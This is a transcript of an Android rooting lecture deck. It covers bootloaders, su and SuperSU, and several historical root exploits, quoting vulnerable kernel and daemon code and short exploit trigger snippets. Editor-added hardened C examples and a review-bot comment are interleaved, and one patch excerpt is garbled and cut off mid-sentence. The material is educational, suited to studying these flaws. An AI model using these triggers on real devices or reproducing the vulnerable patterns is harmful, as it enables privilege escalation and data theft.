Rooting Your Device

About rooting on Android.

Mingshen Sun
October 19, 2015

Transcript

  1. Outline
    1 What?
    2 Why?
    3 How?
    4 HOW???!!!

    Mingshen Sun, ANSR Lab Group Study, September 14, 2015
  2. What?
    rooting: the process of gaining super user privileges on an Android device
    the super user account is called root
    root has rights and permissions over all files and programs on a UNIX-based system
    full control over the operating system
  3. Why?
    access or alter system files to change a hard-coded configuration or behavior
    modify the look and feel with custom themes or boot animations
    uninstall pre-installed applications; system backups and restores
    root apps: iptables-based firewalls, ad-blockers, overclocking
    audit the security of an Android device without being confined by UNIX permissions
  4. Why? — Examples
    Advanced Power Menu+ (APM+)
  5. Why? — Examples
    Fake address of Wechat’s “Moments”.
  6. Why? — Examples
    Xblast
    You can choose your favorite color for your Clock without modifying APK files
    You can add custom text along with the clock, which will be displayed in the status bar and notification bar
    You can add color to the Date field in the notification bar...
    You can choose your favorite font for the clock & Date field in the status bar & notification bar...
    You can add your favorite fonts into your /sdcard/fonts/ folder; they will be listed in the app
    You can add bar code fonts for the clock & Date field in the status bar & notification bar..
    You can add shadow and color for the clock and custom text as you like
    You can choose any color for the status bar...
    You can make the notification bar fully transparent
  7. Why? — Examples
    iPhone Jailbreak
  8. Why not?
    compromises the security protection: all user data is exposed to applications that have been granted root permissions
    an attacker with root can extract all data from the device
  9. HOW???!!! — SU
    https://github.com/ChainsDD/su-binary/blob/master/su.c

        static void allow(const struct su_context *ctx)
        {
            // ...
            /* su is installed set-uid root; regain the effective uid first */
            if (seteuid(0)) {
                PLOGE("seteuid (root)");
                exit(EXIT_FAILURE);
            }
            populate_environment(ctx);
            /* switch real, effective and saved gid/uid to the requested target (0 for a root shell) */
            if (setresgid(ctx->to.uid, ctx->to.uid, ctx->to.uid)) {
                PLOGE("setresgid (%u)", ctx->to.uid);
                exit(EXIT_FAILURE);
            }
            if (setresuid(ctx->to.uid, ctx->to.uid, ctx->to.uid)) {
                PLOGE("setresuid (%u)", ctx->to.uid);
                exit(EXIT_FAILURE);
            }
            // ...
            /* replace the process image with the target shell */
            execv(ctx->to.shell, ctx->to.argv + argc);
        }
  10. HOW???!!! — Objective
    Copy the su binary into the /system/bin or /system/xbin directory.
  11. Understanding the Partition Layout
    boot loader: boot loader program; initializes the hardware, boots the kernel
    splash: first splash screen
    boot: boot image: the Linux kernel (zImage) and the root file system ram disk (initrd)
    recovery: minimal Android boot image
    system: /system, framework, libraries, binaries, pre-installed applications
    userdata: /data, app data, pictures, videos
    cache
    radio
  12. Understanding the Boot Process
    boot loader: manufacturer’s proprietary code; takes care of low-level hardware initialization (clocks, RAM, media); provides support for loading recovery images and putting the phone into download mode
    Android kernel: memory, I/O, memory protections, interrupt handlers, the CPU scheduler, device drivers; finally mounts the root file system and starts the first user-space process, init
    init: init.rc starts core Android services such as rild for telephony and mtpd for VPN access, then Zygote, the Dalvik VM and System Server
  13. Accessing Download Mode
    download mode enables the user to update the persistent storage at a low level
    the flashing process uses the fastboot protocol, a proprietary protocol, or both
    these protocols facilitate various tasks including flashing NAND partitions, rebooting the device, downloading and executing an alternate kernel image, etc.
  14. Locked and Unlocked Boot Loaders
    locked boot loaders prevent the end user from performing modifications to the device’s firmware
    unlocked boot loaders allow a custom kernel, recovery image, or operating system image
    an official mechanism may be in place that enables owners to unlock: fastboot oem unlock; HTC
  15. Locked and Unlocked Boot Loaders
    security implications: all data on a device can be recovered by an attacker who uploads a custom Android boot image or flashes a custom recovery image
    Google accounts, documents, contacts, passwords
    mitigation: unlocking performs a factory data reset
  16. Stock and Custom Recovery Images
    the recovery system allows software updates to replace the entirety of the system software preinstalled on the device without wiping user data
    used to apply updates downloaded manually or Over-the-Air (OTA)
    custom recoveries: ClockworkMod recovery or TeamWin Recovery Project (TWRP)
  17. Rooting with an Unlocked Boot Loader
    1 unlock the boot loader
    2 use fastboot to flash a customized recovery
    3 use the customized recovery to place an su binary into the /system/bin directory
    Chainfire SuperSU: provides a graphical prompt each time an application requests root access; manages which applications or users should be granted root access automatically
  18. Chainfire SuperSU
    cat META-INF/com/google/android/update-binary

        ui_print "- Mounting /system, /data and rootfs"
        mount /system
        mount /data
        mount -o rw,remount /system             # <<-----------------
        mount -o rw,remount /system /system
        mount -o rw,remount /
        mount -o rw,remount / /

        ui_print "- Placing files"
        mkdir /system/bin/.ext
        set_perm 0 0 0777 /system/bin/.ext
        cp_perm 0 0 $SUMOD $BIN/su /system/bin/.ext/.su
        cp_perm 0 0 $SUMOD $BIN/su /system/xbin/su     # <<-----------------
        cp_perm 0 0 0755 $BIN/su /system/xbin/daemonsu
        if ($SUGOTE); then
          cp_perm 0 0 0755 $BIN/su /system/xbin/sugote u:object_r:zygote_exec:s0
          cp_perm 0 0 0755 $MKSH /system/xbin/sugote-mksh
        fi
        if ($SUPOLICY); then
          cp_perm 0 0 0755 $BIN/supolicy /system/xbin/supolicy
          cp_perm 0 0 0644 $BIN/libsupol.so $SYSTEMLIB/libsupol.so
        fi
  19. Rooting with a Locked Boot Loader
    gaining root on a booted system ("soft root"): get a root shell through an unpatched security flaw
    a vulnerability in the Android kernel
    a vulnerability in a process running as root
    a vulnerable program with the set-uid bit
    a symbolic link attack against a file permission bug
  20. Attacks
    Kernel: Wunderbar/asroot
    Recovery: Volez
    Udev: Exploid
    Adbd: RageAgainstTheCage
    Zygote: Zimperlich and Zysploit
    Ashmem: KillingInTheNameOf and psneuter
    Vold: GingerBreak
    PowerVR: levitator
    Libsysutils: zergRush
    Kernel: mempodroid
    File permission and symbolic link-related attacks
    Adb restore race condition
    Exynos4: exynos-abuse
    Diag: lit/diaggetroot
  21. BOB WARNING
    Pay attention. The following content may contain a lot of vulnerable C/C++ code. You may write such vulnerable code in the future. The vulnerabilities may cause considerable damage, even affect national security.
  22. Kernel
        int socket(int domain, int type, int protocol);

    The domain argument specifies a communication domain; this selects the protocol family which will be used for communication. These families are defined in <sys/socket.h>. The currently understood formats include:

        Name                 Purpose                             Man page
        AF_UNIX, AF_LOCAL    Local communication                 unix(7)
        AF_INET              IPv4 Internet protocols             ip(7)
        AF_INET6             IPv6 Internet protocols             ipv6(7)
        AF_IPX               IPX - Novell protocols
        AF_NETLINK           Kernel user interface device        netlink(7)
        AF_X25               ITU-T X.25 / ISO-8208 protocol      x25(7)
        AF_AX25              Amateur radio AX.25 protocol
        AF_ATMPVC            Access to raw ATM PVCs
        AF_APPLETALK         AppleTalk                           ddp(7)
        AF_PACKET            Low level packet interface          packet(7)
  23. Kernel
        struct socket
        {
            socket_state            state;

            unsigned long           flags;
            struct proto_ops        *ops;           /* per-protocol-family operations table */
            struct inode            *inode;
            struct fasync_struct    *fasync_list;   /* Asynchronous wake up list */
            struct file             *file;          /* File back pointer for gc */
            struct sock             *sk;
            wait_queue_head_t       wait;

            short                   type;
            unsigned char           passcred;
        };
  24. Kernel
        struct proto_ops {
            int family;

            int (*release)      (struct socket *sock);
            int (*bind)         (struct socket *sock, struct sockaddr *umyaddr, int sockaddr_len);
            int (*connect)      (struct socket *sock, struct sockaddr *uservaddr, int sockaddr_len, int flags);
            int (*socketpair)   (struct socket *sock1, struct socket *sock2);
            int (*accept)       (struct socket *sock, struct socket *newsock, int flags);
            int (*getname)      (struct socket *sock, struct sockaddr *uaddr, int *usockaddr_len, int peer);
            unsigned int (*poll)(struct file *file, struct socket *sock, struct poll_table_struct *wait);
            int (*ioctl)        (struct socket *sock, unsigned int cmd, unsigned long arg);
            int (*listen)       (struct socket *sock, int len);
            int (*shutdown)     (struct socket *sock, int flags);
            int (*setsockopt)   (struct socket *sock, int level, int optname, char *optval, int optlen);
            int (*getsockopt)   (struct socket *sock, int level, int optname, char *optval, int *optlen);
            int (*sendmsg)      (struct socket *sock, struct msghdr *m, int total_len, struct scm_cookie *scm);
            int (*recvmsg)      (struct socket *sock, struct msghdr *m, int total_len, int flags, struct scm_cookie *scm);
            int (*mmap)         (struct file *file, struct socket *sock, struct vm_area_struct *vma);
            /* the slot sock_sendpage() calls; not every family fills it in */
            ssize_t (*sendpage) (struct socket *sock, struct page *page, int offset, size_t size, int flags);
        };
  25. Kernel
    sendfile - transfer data between file descriptors

        ssize_t sendfile(int out_fd, int in_fd, off_t *offset, size_t count);

    sendfile() copies data between one file descriptor and another. Because this copying is done within the kernel, sendfile() is more efficient than the combination of read(2) and write(2), which would require transferring data to and from user space.
  26. Kernel
    What goes wrong? Linux NULL pointer dereference due to incorrect proto_ops initializations (CVE-2009-2692)

        static ssize_t sock_sendpage(struct file *file, struct page *page,
                                     int offset, size_t size, loff_t *ppos, int more)
        {
            struct socket *sock;
            int flags;

            sock = file->private_data;
            flags = !(file->f_flags & O_NONBLOCK) ? 0 : MSG_DONTWAIT;
            if (more)
                flags |= MSG_MORE;

            /* indirect call through the table; nothing checks the slot for NULL */
            return sock->ops->sendpage(sock, page, offset, size, flags);
        }

    Could sock->ops->sendpage be NULL? Yes. PF_PPPOX and PF_BLUETOOTH do not implement a sendpage function for their sockets, so a sendfile() onto such a socket calls address 0 in kernel mode.
  27. Exploit
        /* ... */
        int fdin = mkstemp(template);                  /* any readable file works as the source */
        int fdout = socket(PF_PPPOX, SOCK_DGRAM, 0);   /* a family whose proto_ops has no sendpage */
        unlink(template);
        ftruncate(fdin, PAGE_SIZE);                    /* give sendfile one page to move */
        sendfile(fdout, fdin, NULL, PAGE_SIZE);        /* kernel calls sock->ops->sendpage == NULL */
        /* ... */
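    The bug on slides 26 and 27 is a dispatch through an operations table whose slot was never filled. The following is an added example written for this transcript, not code from the deck or from the kernel: a user-space model with a vulnerable dispatcher that trusts the table, a hardened dispatcher that refuses an empty slot, and a registration-time fixup that fills empty slots with a stub returning -EOPNOTSUPP, which is the effect the kernel fix had. The struct layout, the family numbers and every function name here are this example's own simplifications.

```c
/* Added example: a user-space model of the sock_sendpage NULL-slot bug.
 * struct proto_ops, the family numbers and all function names are this
 * example's own stand-ins, not kernel definitions. */
#include <errno.h>
#include <stddef.h>
#include <stdio.h>

struct page;   /* opaque, as in the kernel */

struct proto_ops {
    int family;
    int (*sendmsg)(void *sock, const void *buf, size_t len);
    int (*sendpage)(void *sock, struct page *pg, int offset, size_t size, int flags);
};

/* Stand-in for a family that does implement sendpage. */
static int inet_sendpage(void *sock, struct page *pg, int offset, size_t size, int flags)
{
    (void)sock; (void)pg; (void)offset; (void)flags;
    return (int)size;                 /* "sent" the whole page */
}

static int generic_sendmsg(void *sock, const void *buf, size_t len)
{
    (void)sock; (void)buf;
    return (int)len;
}

/* What the fix installs: stubs that fail cleanly instead of NULL slots. */
static int sock_no_sendpage(void *sock, struct page *pg, int offset, size_t size, int flags)
{
    (void)sock; (void)pg; (void)offset; (void)size; (void)flags;
    return -EOPNOTSUPP;
}

static int sock_no_sendmsg(void *sock, const void *buf, size_t len)
{
    (void)sock; (void)buf; (void)len;
    return -EOPNOTSUPP;
}

/* Vulnerable dispatcher: mirrors sock_sendpage(), which trusted the table. */
static int sock_sendpage_vuln(const struct proto_ops *ops, void *sock, struct page *pg, size_t size)
{
    return ops->sendpage(sock, pg, 0, size, 0);   /* calls address 0 if the slot is NULL */
}

/* Hardened dispatcher: refuse when the slot is empty. */
static int sock_sendpage_safe(const struct proto_ops *ops, void *sock, struct page *pg, size_t size)
{
    if (ops == NULL || ops->sendpage == NULL)
        return -EOPNOTSUPP;
    return ops->sendpage(sock, pg, 0, size, 0);
}

/* Registration-time check: fill every empty slot with a failing stub.
 * Returns the number of slots that had to be patched. */
static int proto_ops_fixup(struct proto_ops *ops)
{
    int fixed = 0;
    if (ops->sendmsg == NULL)  { ops->sendmsg  = sock_no_sendmsg;  fixed++; }
    if (ops->sendpage == NULL) { ops->sendpage = sock_no_sendpage; fixed++; }
    return fixed;
}

/* Two constructed tables: a PPPoX-like family that forgot sendpage, and an
 * INET-like family with a complete table. */
struct proto_ops pppox_ops_example = { .family = 24, .sendmsg = generic_sendmsg, .sendpage = NULL };
struct proto_ops inet_ops_example  = { .family = 2,  .sendmsg = generic_sendmsg, .sendpage = inet_sendpage };

int main(void)
{
    printf("pppox sendpage slot before fixup: %s\n", pppox_ops_example.sendpage ? "set" : "NULL");
    printf("safe dispatch on pppox: %d (-EOPNOTSUPP)\n",
           sock_sendpage_safe(&pppox_ops_example, NULL, NULL, 4096));
    printf("fixup patched %d slot(s)\n", proto_ops_fixup(&pppox_ops_example));
    /* after the fixup even the trusting dispatcher is safe to call */
    printf("vuln dispatch after fixup: %d\n", sock_sendpage_vuln(&pppox_ops_example, NULL, NULL, 4096));
    return 0;
}
```

    The real exploit also had to place code at address 0 by mmap()ing the zero page before issuing the sendfile(); on current kernels the vm.mmap_min_addr sysctl refuses that mapping, so the NULL call faults instead of running attacker code. Filling the table, as the fixup above does, removes the bug itself rather than relying on that mitigation.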
  28. Adbd: RageAgainstTheCage
    takes advantage of RLIMIT_NPROC: the maximum number of processes a given UID can have running
    adb daemon <-> adb server

        /* run under root privileges */
        /* don't listen on a port (default 5037) if running in secure mode */
        /* don't run as root if we are running in secure mode */
        if (secure) {
            ...
            /* then switch user and group to "shell" */
            setuid(AID_SHELL);   /* return value never checked */
            setgid(AID_SHELL);
            ...
        }
  29. Adbd: exploit
    the exploit has to be run through the ADB shell (under the shell UID)
    fork processes until the fork call fails (RLIMIT_NPROC exceeded for the shell UID)
    kill adbd (it restarts as root again)
    adbd cannot drop privileges to shell because of the process limit: setuid(AID_SHELL) fails, the return value is not checked, and the daemon keeps running as root
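    As an added example (this editor's code, not adbd's and not from the deck), the unchecked privilege drop from slide 28 next to a checked one. The setuid/setgid calls are passed in as function pointers so the RLIMIT_NPROC failure can be reproduced with a stub that fails with EAGAIN, without needing root or a filled process table; the real wrappers, the stub names and AID_SHELL = 2000 are this example's assumptions.

```c
/* Added example: the privilege-drop pattern RageAgainstTheCage abused.
 * adbd called setuid()/setgid() and ignored the result; when the "shell"
 * UID was at its RLIMIT_NPROC the call failed and adbd stayed root.
 * Function names, stubs and the injectable syscall pointers are this
 * example's own. */
#include <errno.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

#define AID_SHELL 2000   /* Android's "shell" UID/GID, as on the slide */

typedef int (*setid_fn)(unsigned int);

/* Vulnerable shape: results ignored, so a failed drop goes unnoticed. */
static void drop_privs_unchecked(setid_fn do_setuid, setid_fn do_setgid, unsigned int id)
{
    do_setuid(id);   /* on failure we are still root here ... */
    do_setgid(id);   /* ... and carry on serving clients as root */
}

/* Hardened shape: drop the group first (setgid needs privilege that setuid
 * gives away), check every return value, and make the caller refuse to
 * continue on any failure. Returns 0, -1 (setgid failed) or -2 (setuid failed). */
static int drop_privs_checked(setid_fn do_setuid, setid_fn do_setgid, unsigned int uid, unsigned int gid)
{
    if (do_setgid(gid) != 0)
        return -1;
    if (do_setuid(uid) != 0)
        return -2;
    return 0;
}

/* The real syscalls, wrapped to the common signature. */
static int real_setuid(unsigned int id) { return setuid((uid_t)id); }
static int real_setgid(unsigned int id) { return setgid((gid_t)id); }

/* Stubs modelling the exhausted RLIMIT_NPROC: the kernel reports EAGAIN. */
static int stub_fail_eagain(unsigned int id) { (void)id; errno = EAGAIN; return -1; }
static int stub_ok(unsigned int id)          { (void)id; return 0; }

/* After a drop, confirm the process really holds the ids it expects. */
static int verify_ids(uid_t want_uid, gid_t want_gid)
{
    if (getuid() != want_uid || geteuid() != want_uid) return -1;
    if (getgid() != want_gid || getegid() != want_gid) return -1;
    return 0;
}

int main(void)
{
    /* reproduce the bug: setuid "fails" but the unchecked caller continues */
    drop_privs_unchecked(stub_fail_eagain, stub_ok, AID_SHELL);
    printf("unchecked: setuid failed with EAGAIN, caller carried on as uid %u\n", (unsigned)getuid());

    int rc = drop_privs_checked(stub_fail_eagain, stub_ok, AID_SHELL, AID_SHELL);
    printf("checked: rc=%d, caller must exit instead of serving as root\n", rc);

    /* a drop to our own ids is always permitted, so this path exercises the real syscalls */
    rc = drop_privs_checked(real_setuid, real_setgid, getuid(), getgid());
    printf("checked (real ids): rc=%d verify=%d\n", rc, verify_ids(getuid(), getgid()));
    return 0;
}
```

    A daemon that uses the checked form exits when the drop fails; init then restarts it and the attacker's process-table trick buys nothing. The verify step matters on its own: a successful setuid() return still leaves the saved set-user-id unchanged on some call paths, so checking getuid()/geteuid() afterwards catches a drop that only looked complete.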
  30. Vold: GingerBreak
    vold: the volume manager daemon, running as root
    accepts messages received from a PF_NETLINK socket
    result: execute arbitrary code with root privileges
  31. Vold: handlePartitionAdded
        void DirectVolume::handlePartitionAdded(const char *devpath, NetlinkEvent *evt) {
            int major = atoi(evt->findParam("MAJOR"));
            int minor = atoi(evt->findParam("MINOR"));
            int part_num;
            const char *tmp = evt->findParam("PARTN");

            if (tmp) {
                part_num = atoi(tmp);   /* taken from the netlink message; may be negative */
            } else {
                SLOGW("Kernel block uevent missing 'PARTN'");
                part_num = 1;
            }

            if (part_num > mDiskNumParts) {
                mDiskNumParts = part_num;
            }

            if (major != mDiskMajor) {
                SLOGE("Partition '%s' has a different major than its disk!", devpath);
                return;
            }
            mPartMinors[part_num -1] = minor;   // <<---------- no lower bound on the index
            // ...
        }
  32. GingerBreak: Exploit
    the exploit works across builds
    the figure shows how a negative index can be used
    Figure 8-7: Negative GOT index from the heap (memory layout from low to high: .text, GOT, .data, heap; an index of −n from the mPartMinors array on the heap reaches back into the GOT)
  33. GingerBreak: Exploit
    overwrite the GOT entry of the strcmp function with the address of the system function in libc
    ASLR: not present on Gingerbread, so the libc address is stable
    send a NETLINK request to trigger the write
  34. GingerBreak: Patch
    proper check for negative indexes. The following output from git diff shows the relevant change.
    Patch for the Missing Bounds Check in handlePartitionAdded with f3d3ce5
    --- a/DirectVolume.cpp +++ b/DirectVolume.cpp @@ -186,6 +186,11 @@ void DirectVolume: :handlePart i t ionAdded (const char *devpath, Net l inkEvent *evt) part_num = 1; } + if (part_num > MAX_PARTITIONS | | part_num < 1) { + SLOGW("Inval id ' PARTN ' value"); + part_num = 1; + } + if (part_num > mDiskNumParts) { mDiskNumParts = part_num; }
    The missing bounds checks are added here.
    This is a classic instance of a write-four primitive. This primitive describes the situation where an attacker-controlled 32-bit value is written to an attacker-
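    Review bot: the new check falls back to `part_num = 1;` with only a SLOGW, the same value the missing-PARTN branch just above it assigns, so an out-of-range PARTN is not rejected but silently redirected to partition 1 and still reaches the `mPartMinors[part_num -1]` write shown on slide 31. An event carrying a malformed PARTN should be treated as an error and dropped (return, as the major-mismatch branch does) rather than clamped to a valid index.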
  35. Exynos4: exynos-abuse
    /dev/mem is a character device file that is an image of the main memory of the computer. It may be used, for example, to examine (and even patch) the system.
    Exynos4 devices ship a similar node: /dev/exynos-mem
  36. Linux Kernel and Device Driver
    features implemented as modules
    Figure (LDD3, split view of the kernel): the System Call Interface on top; kernel subsystems: process management, memory management, filesystems, device control, networking; features implemented: concurrency and multitasking, virtual memory, files and dirs (the VFS), ttys and device access, connectivity; software support: arch-dependent code, memory manager, file system types, character devices, block devices, network subsystem, IF drivers; hardware: CPU, memory, disks and CDs, consoles, etc., network interfaces
  37. Linux Kernel and Device Driver
        /* drivers/char/mem.c: the memory character devices and their modes */
        static const struct memdev {
            const char *name;
            mode_t mode;
            const struct file_operations *fops;
            struct backing_dev_info *dev_info;
        } devlist[] = {
        #ifdef CONFIG_DEVMEM
            [1] = { "mem", 0, &mem_fops, &directly_mappable_cdev_bdi },
        #endif
        #ifdef CONFIG_DEVKMEM
            [2] = { "kmem", 0, &kmem_fops, &directly_mappable_cdev_bdi },
        #endif
            [3] = { "null", 0666, &null_fops, NULL },
        #ifdef CONFIG_DEVPORT
            [4] = { "port", 0, &port_fops, NULL },
        #endif
            [5] = { "zero", 0666, &zero_fops, &zero_bdi },
            [7] = { "full", 0666, &full_fops, NULL },
            [8] = { "random", 0666, &random_fops, NULL },
            [9] = { "urandom", 0666, &urandom_fops, NULL },
            [11] = { "kmsg", 0, &kmsg_fops, NULL },
        #ifdef CONFIG_CRASH_DUMP
            [12] = { "oldmem", 0, &oldmem_fops, NULL },
        #endif
            /* ... */
  38. Exynos4: exynos-abuse
    What goes wrong?

        #ifdef CONFIG_EXYNOS_MEM
            [14] = {"exynos-mem", S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH, &exynos_mem_fops},
        #endif

    mode 0666 (rw-rw-rw-) for /dev/exynos-mem: any process can open it for reading and writing
    user-space libraries that open the device:
    /system/lib/hw/camera.smdk4x12.so
    /system/lib/hw/gralloc.smdk4x12.so
    /system/lib/libhdmi.so
  39. Exynos4: exynos-abuse
        static const struct file_operations exynos_mem_fops = {
            .open           = exynos_mem_open,
            .release        = exynos_mem_release,
            .unlocked_ioctl = exynos_mem_ioctl,
            .mmap           = exynos_mem_mmap,   /* maps physical memory for any opener */
        };
  40. Exynos4: exynos-abuse
    the exploit maps kernel memory through /dev/exynos-mem and patches the format string used by the function that prints /proc/kallsyms (kptr_restrict would otherwise hide the addresses)
    parses /proc/kallsyms to find the address of the function to patch, removes its permission check, and executes the setresuid system call from user space
    reverses the changes it made to kernel memory and executes a root shell
    a simple patch: set the device permissions to 0660 or 0600
  41. KeyStore Stack Buffer Overflow
    Figure 1: The KeyStore Service
  42. KeyStore Stack Buffer Overflow
        static ResponseCode get_key_for_name(KeyStore* keyStore, Blob* keyBlob, const Value* keyName,
                                             const uid_t uid, const BlobType type) {
            char filename[NAME_MAX];                      /* fixed-size stack buffer */
            encode_key_for_uid(filename, uid, keyName);   /* no buffer length passed down */
            ...
        }

        static int encode_key_for_uid(char* out, uid_t uid, const Value* key) {
            int n = snprintf(out, NAME_MAX, "%u_", uid);   /* only the prefix is bounded */
            out += n;
            return n + encode_key(out, key);
        }

        static int encode_key(char* out, const Value* key) {
            const uint8_t* in = key->value;
            int length = key->length;
            /* every byte outside '0'..'~' expands to two output bytes; nothing
               bounds the write against the NAME_MAX buffer in the caller */
            for (int i = length; i > 0; --i, ++in, ++out) {
                if (*in >= '0' && *in <= '~') {
                    *out = *in;
                } else {
                    *out = '+' + (*in >> 6);
                    *++out = '0' + (*in & 0x3F);
                    ++length;
                }
            }
            *out = '\0';
            ...
        }
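    An added example for slide 42 (written for this transcript; not keystore's code and not keystore's actual fix): the same escaping as encode_key(), but carrying the destination size so the function refuses a key name that would not fit in the NAME_MAX buffer, plus a worst-case size pre-check a caller can apply before touching the buffer. The bounded function names, the helper wrappers and the sample key bytes are this example's own constructions.

```c
/* Added example: a bounded counterpart to the slide's encode_key() /
 * encode_key_for_uid(). The escaping is the slide's (bytes outside
 * '0'..'~' become '+'+(c>>6), '0'+(c&0x3F)); the length handling, the
 * function names and the sample inputs are this example's own. */
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#ifndef NAME_MAX
#define NAME_MAX 255
#endif

/* Encode 'inlen' key bytes into 'out', never writing past 'outlen' bytes
 * (NUL included). Returns the encoded length, or -1 if it would not fit. */
static int encode_key_bounded(char *out, size_t outlen, const uint8_t *in, size_t inlen)
{
    size_t n = 0;
    for (size_t i = 0; i < inlen; i++) {
        uint8_t c = in[i];
        if (c >= '0' && c <= '~') {
            if (n + 1 >= outlen) return -1;          /* room for byte + NUL */
            out[n++] = (char)c;
        } else {
            if (n + 2 >= outlen) return -1;          /* room for two bytes + NUL */
            out[n++] = (char)('+' + (c >> 6));
            out[n++] = (char)('0' + (c & 0x3F));
        }
    }
    out[n] = '\0';
    return (int)n;
}

/* "<uid>_" prefix followed by the escaped key, all within 'outlen'. */
static int encode_key_for_uid_bounded(char *out, size_t outlen, unsigned uid,
                                      const uint8_t *key, size_t keylen)
{
    int n = snprintf(out, outlen, "%u_", uid);
    if (n < 0 || (size_t)n >= outlen) return -1;    /* prefix alone did not fit */
    int m = encode_key_bounded(out + n, outlen - (size_t)n, key, keylen);
    if (m < 0) return -1;
    return n + m;
}

/* Longest possible encoding for this uid and key length (every byte
 * escaped), NUL included; a caller can reject before encoding. */
static size_t encode_key_worst_case(unsigned uid, size_t keylen)
{
    char tmp[16];
    size_t prefix = (size_t)snprintf(tmp, sizeof tmp, "%u_", uid);
    return prefix + 2 * keylen + 1;
}

/* Constructed sample: a NUL byte and 0xFF, both outside '0'..'~'. */
static const uint8_t raw_example[2] = { 0x00, 0xFF };

/* Encode into a NAME_MAX buffer limited to 'outlen' and compare with the
 * expected text. Returns 1 on match, 0 on mismatch, -1 if refused. */
static int encode_matches(size_t outlen, unsigned uid, const uint8_t *key, size_t keylen,
                          const char *expect)
{
    char buf[NAME_MAX];
    if (outlen > sizeof buf) outlen = sizeof buf;
    int n = encode_key_for_uid_bounded(buf, outlen, uid, key, keylen);
    if (n < 0) return -1;
    return strcmp(buf, expect) == 0 && (size_t)n == strlen(expect);
}

/* Returns 1 if a key of 'keylen' 'a' bytes is refused for a NAME_MAX buffer. */
static int long_key_is_refused(size_t keylen)
{
    uint8_t key[512];
    char buf[NAME_MAX];
    if (keylen > sizeof key) keylen = sizeof key;
    memset(key, 'a', keylen);
    return encode_key_for_uid_bounded(buf, sizeof buf, 1000, key, keylen) < 0;
}

int main(void)
{
    char buf[NAME_MAX];
    printf("%d: %s\n", encode_key_for_uid_bounded(buf, sizeof buf, 1000, (const uint8_t *)"abc", 3), buf);
    printf("%d: %s\n", encode_key_for_uid_bounded(buf, sizeof buf, 0, raw_example, 2), buf);
    printf("300-byte key refused: %d\n", long_key_is_refused(300));
    printf("worst case for uid 1000, 10 bytes: %zu\n", encode_key_worst_case(1000, 10));
    return 0;
}
```

    The slide's exploit on the next page simply passes a key name longer than NAME_MAX; with the bounded encoder the call returns -1 and get_key_for_name() can answer with an error instead of smashing its stack frame.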
  43. KeyStore Exploit
        Class keystore = Class.forName("android.security.KeyStore");
        Method mGetInstance = keystore.getMethod("getInstance");
        Method mGet = keystore.getMethod("get", String.class);
        Object instance = mGetInstance.invoke(null);
        // a key name longer than NAME_MAX overruns filename[] in get_key_for_name()
        mGet.invoke(instance,
            "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" +
            "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" +
            "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" +
            "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" +
            "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" +
            "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" +
            "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa");
  44. Summary
    sources: the Linux kernel; Android userspace; Linux device drivers written by SoC vendors
    methods: buffer overflow; integer overflow; use-after-free
  45. Vulnerability
    Figure: Proportion of devices running vulnerable versions of Android
  46. Advertising
    Emacs and Spacemacs: writing code, version control, editing LaTeX files, organizing your life, managing email
  47. References
    Android Hacker’s Handbook
    Android Security Internals
    Linux Device Drivers, Third Edition: https://lwn.net/Kernel/LDD3/